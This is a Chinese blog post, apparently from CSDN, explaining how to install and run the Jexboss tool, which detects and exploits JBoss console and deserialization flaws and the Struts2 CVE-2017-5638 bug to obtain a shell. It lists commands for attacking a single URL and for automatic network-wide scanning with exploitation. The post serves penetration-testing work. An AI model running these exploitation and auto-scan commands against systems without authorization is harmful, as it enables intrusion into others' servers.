随记(七):Jboss漏洞检测利用工具

最新推荐文章于 2024-05-12 08:27:06 发布
最新推荐文章于 2024-05-12 08:27:06 发布
阅读量4.3k 收藏 6
点赞数
分类专栏: 随记 文章标签: 网络安全 安全漏洞 扫描测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhanglichon666/article/details/110734486
版权

Jboss漏洞检测利用工具

Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。

工具下载:https://github.com/joaomatosf/jexboss

此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。

0x01 安装方法

## 克隆项目至本地
git clone https://github.com/joaomatosf/jexboss.git
## 切换至项目根目录
cd jexboss
## 安装项目所需要的依赖
pip2 install -r requires.txt
## 使用
python2 jexboss.py -h

在这里插入图片描述

0x02 使用方法

## 攻击目标网站
python2 jexboss.py -u http://192.168.0.26:8080

在这里插入图片描述
在这里插入图片描述

## 网络扫描模式
python2 jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

在这里插入图片描述

## 自动化漏洞利用的网络扫描模式
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

## 自动化漏洞利用的网络扫描模式(多端口)
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080,80,8888 -results results_auto_scan.txt

## 批量扫描
python2 jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log

## 针对 Apache Struts2(CVE-2017-5638漏洞)
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2

## 带Cookie的CVE-2017-5638漏洞利用
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2 --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
XXR_Beta
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
随记:flex发送XML到servlet
03-01
标题“随记:flex发送XML到servlet”指的是在Flex应用程序中向Java Servlet发送XML数据的过程,这通常涉及到客户端与服务器端的交互。Flex是一种基于Adobe AIR或Flash Player运行时的开发框架,常用于创建富互联网...
探索JBoss扫描利器:GGyao/jbossScan
gitblog_00074的博客
04-05 361
探索JBoss扫描利器:GGyao/jbossScan 项目地址:https://gitcode.com/GGyao/jbossScan 项目简介 GGyao/jbossScan 是一个专门针对JBoss应用服务器进行安全漏洞扫描的开源工具。该项目旨在帮助系统管理员和安全研究人员快速、有效地发现并修复JBoss环境中的潜在安全隐患,提高系统的安全性。 技术分析 1. 漏洞检测引擎 项目利用了自动化...
一个简单探测jboss漏洞工具
网络安全。
02-13 2911
0x01 项目介绍 自研工具。批量探测jboos系列漏洞路径,特别在内网渗透中,提高效率。(此工具仅探测漏洞所在路径,漏洞是否存还需对应exp验证。) 项目地址:https://github.com/GGyao/jbossScan 0x02 jboss漏洞介绍 CVE-2015-7501 JBoss JMXInvokerServlet 反序列化漏洞。此漏洞存在于JBoss中/invoker/JMX...
深入浅出带你学习JBoss中间件常见漏洞
最新发布
dzqxwzoe的博客
05-12 978
简单来说可以介绍为一个开源的符合J2EE规范的应用服务器,作为J2EE规范的补充,Jboss中引入了AOP框架,为普通Java类提供了J2EE服务,而无需遵循EJB规范。该中间件的特点如下:它将具有革命性的JMX微内核服务作为其总线结构;它本身就是面向服务的架构(Service-Oriented Architecture,SOA);它还具有统一的类装载器,从而能够实现应用的热部署和热卸载能力。了解完JBOSS中间件的介绍,下面我们来讲关于该中间件的漏洞。成功部署的提示为。
JBOSS使用指南
Constant from time complexity and space complexity of perfect oneself
06-26 1860
                                                                              JBOSS使用指南                                                                              Release v1.0             
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1227
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
【2024版】最新多款渗透测试实用原创工具来袭!
liuhyusb的博客
11-16 418
上述几个工具均使用java开发,环境要求:JDK1.8版本java -jar "文件名" 即可打开图形化界面。注意查看"必看操作说明"模块。
Jboss(CVE-2017-12149)反序列化命令执行漏洞
weixin_51151498的博客
12-11 2170
Jboss(CVE-2017-12149)反序列化命令执行漏洞
接口测试工具:Postman
04-15
Postman作为一款强大的接口测试工具,被广大开发者和测试人员所青睐。本文将详细介绍Postman的特性、安装及使用方法,以及如何通过它来进行接口测试。 Postman最初是一个Chrome浏览器插件,但现在已经发展成为独立...
HL_Letter:个人随记
05-02
【HL_Letter:个人随记】是一个以Java技术为核心的个人学习笔记项目,它可能是某位开发者记录自己在Java编程过程中的心得、技巧和问题解决方案的集合。从项目名称来看,"HL_Letter"可能代表了作者的名字或者某种缩写...
端口转发工具:PortTunnel
05-15
PortTunnel是一个TCP/IP的port redirector /端口映射软件,它可自动产生log记录,也可以调整你的网络状况。
Jboss漏洞利用工具
09-01
Jboss漏洞利用的小工具。执行命令一次不行可以尝试多次执行
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用
AJAX 随记
10-29
在本篇随记中,我们将探讨如何结构化地创建和使用一个基础的AJAX实现。 首先,我们需要创建一个AJAX对象。在不同的浏览器环境下,XMLHttpRequest对象的创建方式有所不同。在现代浏览器中,我们可以通过`new ...
Jboss漏洞利用
u011215939的博客
01-23 8067
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
JBoss工具3.1最终版
06-17 272
现在可以下载JBoss Tools 3.1的最终版本。 JBoss Tools 3.1 Final引入了对JBoss企业应用程序平台,Enterprise SOA平台5,JBoss AS 5.x和AS 6 M1的支持。 现在还支持JavaServer Faces 2,Seam 2.2,JBoss Portal及其后续产品GateIn和Enterprise Portal Platform。 ...
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1058
JBoss Application Server 相关漏洞复现
探索JBoss漏洞利用工具:`jbossvulnscan`
gitblog_00094的博客
03-29 699
探索JBoss漏洞利用工具jbossvulnscan 项目地址:https://gitcode.com/yunxu1/jboss-_CVE-2017-12149 项目简介 jbossvulnscan是一个针对JBoss应用服务器的安全扫描工具,它旨在帮助安全研究人员和系统管理员发现并利用CVE-2017-12149这个高危漏洞。这个漏洞允许未经身份验证的远程攻击者执行任意代码,对系统的安全性构...
随记洗牌发牌的C语言程序
06-06
以下是一个简单的随机洗牌发牌程序的C语言代码: ```c #include <stdio.h> #include <stdlib.h> #include <time.h> #define DECK_SIZE 52 #define SUIT_SIZE 13 int main() { int deck[DECK_SIZE]; int i, j, temp; // 初始化牌堆 for (i = 0; i < DECK_SIZE; i++) { deck[i] = i; } // 随机洗牌 srand(time(NULL)); for (i = 0; i < DECK_SIZE; i++) { j = rand() % DECK_SIZE; temp = deck[i]; deck[i] = deck[j]; deck[j] = temp; } // 发牌 printf("Player 1's hand:\n"); for (i = 0; i < SUIT_SIZE; i++) { printf("%d ", deck[i]); } printf("\n\n"); printf("Player 2's hand:\n"); for (i = SUIT_SIZE; i < SUIT_SIZE * 2; i++) { printf("%d ", deck[i]); } printf("\n\n"); printf("Player 3's hand:\n"); for (i = SUIT_SIZE * 2; i < SUIT_SIZE * 3; i++) { printf("%d ", deck[i]); } printf("\n\n"); printf("Player 4's hand:\n"); for (i = SUIT_SIZE * 3; i < DECK_SIZE; i++) { printf("%d ", deck[i]); } printf("\n\n"); return 0; } ``` 这个程序首先初始化了一个52张牌的牌堆数组,然后使用`srand`和`rand`函数来进行随机洗牌。最后,程序按照四个玩家的顺序,从洗好的牌堆中取出各自的牌,输出给玩家。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值